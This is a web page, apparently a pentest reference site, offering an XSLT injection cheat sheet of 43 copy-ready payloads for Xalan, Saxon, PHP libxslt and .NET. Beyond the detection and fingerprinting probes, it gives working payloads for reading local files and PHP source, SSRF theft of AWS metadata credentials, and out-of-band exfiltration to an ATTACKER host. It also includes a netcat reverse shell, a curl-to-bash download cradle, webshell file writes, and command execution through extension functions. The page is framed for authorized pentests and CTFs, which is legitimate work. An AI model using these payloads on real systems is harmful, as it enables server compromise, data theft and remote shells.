XSLT Injection Cheat Sheet

Real, public XSLT injection techniques for authorized pentests, bug bounties, and CTFs — processor fingerprinting, file read, SSRF, and RCE via Java/PHP/.NET extension functions. (43 payloads)

Try it interactively with the SSTI Identifier & Payload Builder

Detection & Probing

(7)

<xsl:value-of select="1+1"/>

Minimal injection probe. If the rendered output contains '2' rather than the literal string, your input is being parsed as XSLT/XPath and evaluated — the single most reliable confirmation of XSLT injection.Reflected stylesheet/template contexts; first thing to try

<xsl:value-of select="concat('inj','ected')"/>

Confirms XPath function evaluation specifically. Seeing 'injected' (the concatenated result) proves the engine is running XPath, ruling out coincidental output of an arithmetic value.When 1+1 could plausibly appear in normal output

<xsl:if test="1=1">VULNERABLE</xsl:if>

Boolean oracle. The marker renders only when the XSLT conditional is evaluated; absent in a non-vulnerable echo. Useful for blind contexts where you control structure but not direct value-of output.Blind detection — invert with 1=2 to confirm the conditional actually executes

}}{{ <xsl:value-of select="system-property('xsl:version')"/>

Breaks out of a surrounding template expression (e.g. a Mustache/Jinja-style wrapper that emits into a stylesheet) before injecting raw XSLT. Adjust the breakout delimiters to the host templating language.When XSLT is generated by another template engine — chain SSTI into XSLTi

<xsl:message terminate="yes">probe</xsl:message>

Forces the processor to abort and emit a message. A resulting error/blank page (vs normal output) is a strong blind signal that your input reached the transformer.Blind detection; terminate=yes makes the abort observable

<xsl:value-of select="unparsed-entity-uri('x')"/>

XSLT 2.0+ function probe. Errors or empty-but-valid output here help distinguish a 2.0/3.0 engine (Saxon) from a 1.0-only engine (libxslt, default Xalan) before you commit to version-specific payloads.Capability fingerprinting after basic injection is confirmed

<xsl:value-of select="format-number(1,'#')"/>

Exercises a core XSLT 1.0 function available in every conformant processor. A clean '1' result confirms a full XSLT engine (not just an XPath sandbox) is in play.Distinguishes full XSLT processors from bare XPath evaluators

Version & Environment Disclosure

(8)

<xsl:value-of select="system-property('xsl:version')"/>

Returns the supported XSLT version (1.0, 2.0, or 3.0). The single most useful fingerprint: it tells you whether 2.0 functions like document() variants, unparsed-text(), and EXSLT extensions are available.Standard property in all processors — start here

<xsl:value-of select="system-property('xsl:vendor')"/>

Reveals the processor vendor string, e.g. 'Apache Software Foundation (Xalan XSLTC)', 'SAXON', 'libxslt', or 'Microsoft'. This drives every downstream choice — extension namespaces and RCE vectors differ entirely by vendor.Critical: vendor decides which RCE/extension payloads will work

<xsl:value-of select="system-property('xsl:vendor-url')"/>

Vendor homepage URL, a secondary fingerprint that disambiguates forks (e.g. xml.apache.org for Xalan vs saxon.sourceforge.net / saxonica.com for Saxon).Tie-breaker when the vendor string is ambiguous

<xsl:value-of select="system-property('xsl:product-name')"/>

Saxon-specific product name (e.g. 'SAXON HE'). Distinguishes Saxon Home Edition (no Java reflection extensions) from Professional/Enterprise (reflexive extension functions enabled) — directly affects RCE feasibility.Saxon — HE vs PE/EE gates the Java-reflection RCE path

<xsl:value-of select="system-property('xsl:product-version')"/>

Saxon product version string. Map it to known Saxon CVEs and to whether reflective/Java extensions were enabled by default in that release.Saxon — version-to-CVE mapping and default extension behaviour

<xsl:value-of select="system-property('java.version')"/>

On Java processors (Xalan, Saxon), exposes the JVM version. Confirms a Java backend — the prerequisite for Xalan/Saxon Java-extension RCE — and helps pick reflection vs ProcessBuilder gadgets.Java backends only; non-Java engines return empty

<xsl:value-of select="system-property('user.dir')"/>

Leaks the JVM working directory (a Java system property). Useful for locating relative file paths and the app's deployment root before attempting file reads or writes.Java backends — path discovery for follow-on file ops

<xsl:value-of select="php:function('phpversion')"/>

On PHP's libxslt binding (with registered PHP functions enabled), discloses the PHP version. A non-empty result also proves php:function() is callable — the gateway to PHP RCE below.PHP/libxslt with XSLTProcessor::registerPHPFunctions() enabled

Local File Read

(7)

<xsl:value-of select="unparsed-text('/etc/passwd')"/>

XSLT 2.0/3.0 native file read. unparsed-text() loads a local file as text and value-of prints it — clean, in-band exfiltration with no extension functions required on a Saxon-class engine.Saxon / any XSLT 2.0+ processor; cleanest 2.0 file-read

<xsl:value-of select="unparsed-text('file:///etc/passwd')"/>

Same read using an explicit file:// URI, which some processors require (or which avoids relative-path resolution surprises). Swap in c:/windows/win.ini on Windows targets.XSLT 2.0+; use file:// when bare paths are rejected

<xsl:copy-of select="document('/etc/passwd')"/>

Reads a file via document() and copies its node tree into output. Works when the target is well-formed XML; for arbitrary text the unparsed-text() variants are more reliable.document() expects parseable XML — best for config/XML files

<xsl:value-of select="php:function('file_get_contents','/etc/passwd')"/>

PHP/libxslt file read by calling PHP's file_get_contents through the registered-function bridge. Reads arbitrary files (no XML well-formedness needed) when registerPHPFunctions() is on.PHP libxslt with PHP functions registered

<xsl:value-of select="php:function('file_get_contents','php://filter/convert.base64-encode/resource=/var/www/html/config.php')"/>

Wraps the read in a PHP filter to base64-encode the source, letting you pull PHP source code (or any binary) intact through XML output without breaking the document. Decode the result offline.PHP libxslt — exfil PHP source safely via php:// filter

<xsl:value-of select="document('file:///etc/passwd')" disable-output-escaping="yes"/>

Adds disable-output-escaping to preserve raw bytes/markup in the output, avoiding HTML-entity mangling of the leaked content. Pair with any document()/unparsed-text() read.Use when output escaping corrupts the leaked file content

<xsl:for-each select="document('file:///etc/passwd')//*"><xsl:value-of select="."/></xsl:for-each>

Iterates and prints every node of a document()-loaded XML file. Handy when copy-of is filtered or when you need to flatten nested elements into plain output.Filter evasion when copy-of/value-of of the root is blocked

SSRF & Out-of-Band

(7)

<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/iam/security-credentials/')"/>

Classic cloud-metadata SSRF: document() makes the processor fetch the AWS IMDS endpoint and the response is rendered back to you. Swap the path for GCP/Azure metadata roots as needed.Cloud metadata theft — IMDSv1 hosts; in-band response

<xsl:value-of select="document('http://127.0.0.1:8080/admin')"/>

Pivots to internal-only services. Because the request originates server-side, it bypasses firewall/network segmentation and any IP allowlist that trusts localhost.Internal service access / SSRF pivot

<xsl:value-of select="document('http://ATTACKER/canary')"/>

Blind/OOB connectivity probe. A hit on your listener confirms the engine performs outbound HTTP via document() — establishing the SSRF primitive before crafting a data-bearing exfil URL.Blind detection of outbound network capability

<xsl:value-of select="document(concat('http://ATTACKER/?d=',encode-for-uri(unparsed-text('/etc/hostname'))))"/>

Out-of-band file exfiltration: read a local file with unparsed-text(), URL-encode it, and smuggle it out as a query parameter to your server. Works even when in-band output is suppressed.Saxon/XSLT 2.0 — blind file read via OOB callback

<xsl:value-of select="unparsed-text('http://ATTACKER/x')"/>

Outbound fetch using unparsed-text() instead of document() — an alternative SSRF/OOB primitive useful when document() is restricted or when you want a text response unparsed as XML.XSLT 2.0+; document()-restricted environments

<xsl:value-of select="php:function('file_get_contents','http://169.254.169.254/latest/meta-data/')"/>

SSRF through the PHP bridge. file_get_contents follows HTTP wrappers, so libxslt setups with registered PHP functions get full SSRF (and protocol smuggling via gopher://, etc.) for free.PHP libxslt — SSRF with wrapper/protocol flexibility

<xsl:value-of select="document('http://ATTACKER:80/')" xmlns:exsl="http://exslt.org/common"/>

Forces a connect to an arbitrary host:port; combined with timing/error differences this enables internal port scanning by walking ports and observing connect vs refuse behaviour.Internal port scan via connect-success oracle

RCE — Java (Xalan / Saxon)

(7)

<xsl:value-of xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" select="rt:exec(rt:getRuntime(),'id')"/>

Canonical Xalan-J Java extension RCE. The xalan/java/ namespace maps element/function names to Java classes via reflection; getRuntime() then exec() runs an OS command. The flagship XSLTi-to-RCE chain.Apache Xalan-J with Java extensions enabled (default in many setups)

<xsl:variable name="rtobj" select="rt:getRuntime()" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"/><xsl:variable name="proc" select="rt:exec($rtobj,'nc ATTACKER 4444 -e /bin/sh')" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"/><xsl:value-of select="$proc"/>

Two-stage Xalan RCE that stages the Runtime object in a variable, then spawns a reverse shell. Splitting into variables sidesteps single-expression length limits and some naive payload filters.Xalan-J — reverse shell; have a listener ready (nc -lvnp 4444)

<xsl:value-of xmlns:pb="http://xml.apache.org/xalan/java/java.lang.ProcessBuilder" select="pb:start(pb:new('/bin/sh','-c','id'))"/>

ProcessBuilder-based command execution, an alternative to Runtime.exec that handles argument arrays cleanly (avoids shell-quoting pitfalls) and may evade signatures that only match getRuntime/exec.Xalan-J — ProcessBuilder variant; cleaner arg handling + filter evasion

<xsl:value-of xmlns:scr="http://xml.apache.org/xalan/java" select="scr:java.lang.Runtime.getRuntime().exec('id')"/>

Uses the short xalan/java namespace with a fully-qualified static call style. Equivalent to the explicit-namespace form but more compact; useful when crafting one-liner injections.Xalan-J — compact static-call namespace form

<xsl:value-of select="FileWriter:new('/var/www/html/sh.jsp')" xmlns:FileWriter="http://xml.apache.org/xalan/java/java.io.FileWriter"/>

Java FileWriter via Xalan extensions to create/write an arbitrary file (chain with FileWriter:write + :close) — drop a JSP/webshell into the web root when direct exec is locked down.Xalan-J — arbitrary file write -> webshell drop

<xsl:value-of select="saxon:eval(saxon:expression('Runtime.getRuntime().exec(\"id\")'))" xmlns:saxon="http://saxon.sf.net/"/>

Saxon dynamic-evaluation path. saxon:expression()/saxon:eval() compile and run an XPath expression at runtime; on Saxon PE/EE with reflexive extensions this reaches Java methods. HE blocks it.Saxon PE/EE with reflexive extension functions; not Saxon HE

<xsl:value-of xmlns:rt="http://saxon.sf.net/java-type" select="system-property('xsl:vendor')"/>

Confirm you are on Saxon (and which edition) before attempting Saxon RCE — the java-type namespace and reflexive extensions are edition-gated, so verify the vendor/product first to avoid noisy failures.Saxon — pre-RCE confirmation step

RCE — PHP & .NET / EXSLT

(7)

<xsl:value-of select="php:function('system','id')"/>

PHP/libxslt RCE via the registered-function bridge. If the app called XSLTProcessor::registerPHPFunctions() (no allowlist), php:function() can invoke system()/exec()/passthru() directly. The primary PHP XSLTi-to-RCE vector.PHP libxslt with unrestricted registerPHPFunctions()

<xsl:value-of select="php:function('passthru','curl http://ATTACKER/s|bash')"/>

Stages a download-and-execute reverse shell through PHP passthru(). passthru streams raw output, useful for binary command results; swap for shell_exec/exec depending on what is callable.PHP libxslt — reverse shell via download-cradle

<xsl:value-of select="php:functionString('shell_exec','id')"/>

functionString variant that coerces the call result to a string for value-of — use when php:function returns a non-string node type and output comes back empty.PHP libxslt — when php:function output is empty/non-string

<msxsl:script language="C#" implements-prefix="user" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><![CDATA[ public string Run(){ return new System.Diagnostics.Process(){ StartInfo = { FileName="cmd.exe", Arguments="/c whoami", RedirectStandardOutput=true, UseShellExecute=false } }.StandardOutput.ReadToEnd(); } ]]></msxsl:script>

MSXSL embedded-script RCE on .NET's System.Xml.Xsl. When XsltSettings.EnableScript is true, msxsl:script blocks run arbitrary C#/JScript in-process — full RCE on the server..NET XslCompiledTransform with EnableScript=true

<xsl:value-of select="user:Run()" xmlns:user="urn:my-scripts"/>

Invokes the C# method defined in the msxsl:script block above (or any registered extension object). Pair the script definition with this call to materialise the command output in the transform result..NET — call the injected/registered script method

<xsl:value-of select="exsl:node-set(...)" xmlns:exsl="http://exslt.org/common"/>

EXSLT capability check. Many engines enable EXSLT modules (common, dynamic, etc.); confirming exsl support points to exsl:dynamic / dyn:evaluate paths that can broaden expression injection where native eval is blocked.EXSLT-enabled engines — gateway to dyn:evaluate expansion

<xsl:value-of select="dyn:evaluate('system-property(\'xsl:vendor\')')" xmlns:dyn="http://exslt.org/dynamic"/>

EXSLT dyn:evaluate runs a dynamically-built XPath string. It turns a static injection point into runtime expression evaluation, letting you assemble extension/RCE calls from concatenated, filter-evading fragments.EXSLT dynamic module — dynamic XPath for filter evasion

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

SSRF Cheat Sheet SSTI Cheat Sheet XXE Cheat Sheet XPath Injection Cheat Sheet

Frequently asked questions

What is the XSLT Injection Cheat Sheet?+

It's a quick-reference collection of 43 XSLT Injection payloads for testing XSLT Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these XSLT Injection payloads?+

Copy any payload straight into your authorized test, or use the SSTI Identifier & Payload Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these XSLT Injection payloads free to use?+

Yes — this cheat sheet and all XSLT Injection payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the XSLT Injection Cheat Sheet?+

How do I use these XSLT Injection payloads?+

Copy any payload straight into your authorized test, or use the SSTI Identifier & Payload Builder to apply them interactively. Only test systems you have explicit permission to assess.

Are these XSLT Injection payloads free to use?+

Yes — this cheat sheet and all XSLT Injection payloads are completely free, with no account required. Everything runs in your browser.

XSLT Injection Cheat Sheet

Detection & Probing

Version & Environment Disclosure

Local File Read

SSRF & Out-of-Band

RCE — Java (Xalan / Saxon)

RCE — PHP & .NET / EXSLT

Related Tools

Related Cheat Sheets

Frequently asked questions

XSLT Injection Cheat Sheet

Detection & Probing

Version & Environment Disclosure

Local File Read

SSRF & Out-of-Band

RCE — Java (Xalan / Saxon)

RCE — PHP & .NET / EXSLT

Related Tools

Related Cheat Sheets

Frequently asked questions